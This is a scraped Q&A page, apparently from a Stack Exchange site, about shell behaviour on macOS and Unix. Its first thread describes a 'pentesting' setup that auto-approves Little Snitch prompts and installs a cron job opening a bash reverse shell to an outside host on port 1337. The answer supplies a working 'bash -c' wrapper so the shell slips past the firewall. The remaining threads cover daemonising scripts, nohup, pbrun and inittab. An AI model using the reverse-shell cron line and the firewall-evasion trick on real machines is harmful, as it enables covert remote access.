OS X: cron job invokes bash but process run is 'sh' - macos

I'm working on a pentesting project in which I want to open a reverse shell. I have a device that can trigger Little Snitch and then set it to allow outbound connections for certain processes. It does this by issuing a reverse shell command and, when the LS window pops up, acts as a keyboard to tell LS to always allow this type of connection. I can successfully do this for Bash, Perl, Python and Curl. The device also installs a cron job which contains a one-line reverse shell using bash.
But here's the problem...
The first time the cron job runs, Little Snitch still gets triggered because it has seen an outbound connection from 'sh' - not 'bash'. Yet the command definitely calls bash. The cron job is:
*/5 * * * * /bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &
Subsequent connections are either from bash or sh - I haven't yet detected a pattern.
I've tried triggering LS in the original setup by using /bin/sh, but at that stage it still gets interpreted (ie, is seen by LS) as bash, not sh (as, in OS X, they as essentially the same thing but with slightly different behaviours depending on how invoked).
Any thoughts about how I can stop OS X using sh rather than bash in the cron job. Or, alternatively, how I can invoke sh rather than bash? (Like I said, /bin/sh doesn't do it!).

The command string is /bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &. Cron needs to invoke this command. It doesn't parse the command string itself to learn that the first "word" is /bin/bash and then execute /bin/bash, passing it the rest of the arguments. (Among other things, not all parts of the command are arguments.)
Instead, it invokes /bin/sh with a first argument of -c and the second argument being your command string. That's just the generic way to run a command string.
Then, /bin/sh interprets the command string. Part of the command is redirection. This is not done by the program that the command launches. It is done by the shell which will launch that program. That is, the instance of /bin/sh has to set up the file descriptors for the child process it's going to launch prior to launching that child process.
So, /bin/sh opens /dev/tcp/connect.blogsite.org/1337. It then passes the file descriptor to the child process it launches as descriptors 0 and 1. (It could do this using fork() and dup2() before execve() or it could do it all using posix_spawn() with appropriate file actions.)
The ultimate /bin/bash process doesn't open its own input or output. It just inherits them and, presumably, goes on to use them.
You could fix this by using yet another level of indirection in your command string. Basically, invoke /bin/bash with -c and its own command string. Like so:
*/5 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &'
So, the initial instance of /bin/sh won't open the file. It will simply spawn an instance of /bin/bash with arguments -c and the command string. That first instance of /bin/bash will interpret the command string, open the file in order to carry out the redirection directives, and then spawn a second instance of /bin/bash which will inherit those file descriptors.

Related

How to daemonise a shell-script in FreeBSD (and macOS)

The way I normally start a long-running shell script is
% (nohup ./script.sh </dev/null >script.log 2>&1 & )
The redirections close stdin, and reopen stdout and stderr; the nohup stops HUP reaching the process when the owning process exits (I realise that the 2>&1 is somewhat redundant, since the nohup does something like this anyway); and the backgrounding within the subshell is the double-fork which means that the ./script.sh process's parent has exited while it's still running, so it acquires the init process as its parent.
That doesn't completely work, however, because when I exit the shell from which I've invoked this (typically, of course, I'm doing this on a remote machine), it doesn't exit cleanly. I can do ^C to exit, and this is OK – the process does carry on in the background as intended. However I can't work out what is/isn't happening to require the ^C, and that's annoying me.
The actions above seem to tick most of the boxes in the unix FAQ (question 1.7), except that I'm not doing anything to detach this process from a controlling terminal, or to make it a session leader. The setsid(2) call exists on FreeBSD, but not the setsid command; nor, as far as I can see, is there an obvious substitute for that command. The same is true on macOS, of course.
So, the questions are:
Is there a differently-named caller of setsid on this platform, that I'm missing?
What, precisely, is happening when I exit the calling shell, that I'm killing with the ^C? Is there any way this could bite me?
Related questions (eg 1, 2) either answer a slightly different question, or assume the presence of the setsid command.
(This question has annoyed me for years, but because what I do here doesn't actually not work, I've never before got around to investigating, getting stumped, and asking about it).
In FreeBSD, out of the box you could use daemon -- run detached from the controlling terminal. option -r could be useful:
-r Supervise and restart the program after a one-second delay if it
has been terminated.
You could also try a supervisor, for example immortal is available for both platforms:
pkg install immortal # FreeBSD
brew install immortal # macOS
To daemonize your script and log (stdout/stderr) you could use:
immortal /path/to/your/script.sh -l /tmp/script.log
Or for more options, you could create a my-service.yml for example:
cmd: /path/to/script
cwd: /your/path
env:
DEBUG: 1
ENVIROMENT: production
log:
file: /tmp/app.log
stderr:
file: /tmp/app-error.log
And then run it with immortal -c my-service.yml
More examples can be found here: https://immortal.run/post/examples
If just want to use nohup and save the stdout & stderr into a file, you could add this to your script:
#!/bin/sh
exec 2>&1
...
Check more about exec 2>&1 in this answers https://stackoverflow.com/a/13088401/1135424
And then simply call nohup /your/script.sh & and check the file nohup.out, from the man
FILES
nohup.out The output file of the nohup execution if stan-
dard output is a terminal and if the current
directory is writable.
$HOME/nohup.out The output file of the nohup execution if stan-
dard output is a terminal and if the current
directory is not writable.

Running a script in PowerBroker

I'm trying to script my commands that are run inside the pbrun shell. I've tried executing through a normal script, but that doesn't work because, to my understanding, pbrun is executed in its won subshell, making it hard, if not impossible, to pass commands to.
The only solution I'm thinking might work is that if I have a input/output text processor that listens to the terminal and responds accordingly.
I was able to send commands to the standard input of pbrun:
echo 'echo $HOSTNAME' | pbrun bash

How to run shell script on VM indefinitely?

I have a VM that I want running indefinitely. The server is always running but I want the script to keep running after I log out. How would I go about doing so? Creating a cron job?
In general the following steps are sufficient to convince most Unix shells that the process you're launching should not depend on the continued existence of the shell:
run the command under nohup
run the command in the background
redirect all file descriptors that normally point to the terminal to other locations
So, if you want to run command-name, you should do it like so:
nohup command-name >/dev/null 2>/dev/null </dev/null &
This tells the process that will execute command-name to send all stdout and stderr to nowhere (instead of to your terminal) and also to read stdin from nowhere (instead of from your terminal). Of course if you actually have locations to write to/read from, you can certainly use those instead -- anything except the terminal is fine:
nohup command-name >outputFile 2>errorFile <inputFile &
See also the answer in Petur's comment, which discusses this issue a fair bit.

Putty closes on executing bash script

I am writing my first ever bash script, so excuse the noobie-ness.
It's called hello.bash, and this is what it contains:
#!/bin/bash
echo Hello World
I did
chmod 700 hello.bash
to give myself permissions to execute.
Now, when I type
exec hello.bash
My putty terminal instantly shuts down. What am I doing wrong?
From the man page for exec:
If command is supplied, it replaces the shell without creating a new process. If no command is specified, redirections may be used to affect the current shell environment.
So your script process runs in place of your terminal and when it exits, so does your terminal. Just execute it instead:
./hello.bash

How to start a linux shell as from /etc/inittab

We used to have two entries in our /etc/inittab:
::sysinit:/etc/init.d/rcS
ttyS0::respawn:-/bin/sh
rcS is a shell script which normally starts our application, but in a special case we called "return" to terminate it which apparently lets the /bin/sh take over the tty as we got a shell prompt where we could do some maintenance.
Now the inittab looks like this:
::once:/etc/init.d/rcS
We now start the shell by executing "/bin/bash -i" in the rcS script, as we don't want to always run a second shell (due to memory constraints) which is normally never used.
But the created bash doesn't feature job control, which is very limiting.
So my question is, can I create a shell (and maybe terminate the rcS script) the same way the init processed did in our previous solution so that I get again a shell with job control?
This depends on exactly what OS you are running. Here is an example which works on RHEL/CentOS.
6:2345:respawn:/sbin/mingetty --autologin root tty6
Here is what someone else did for a similar trick.
openvt -f -c 12 -w -- sh -c "unicode_start; echo -e '$NORPT'; exec $LOGINSH" >/dev/tty1

Resources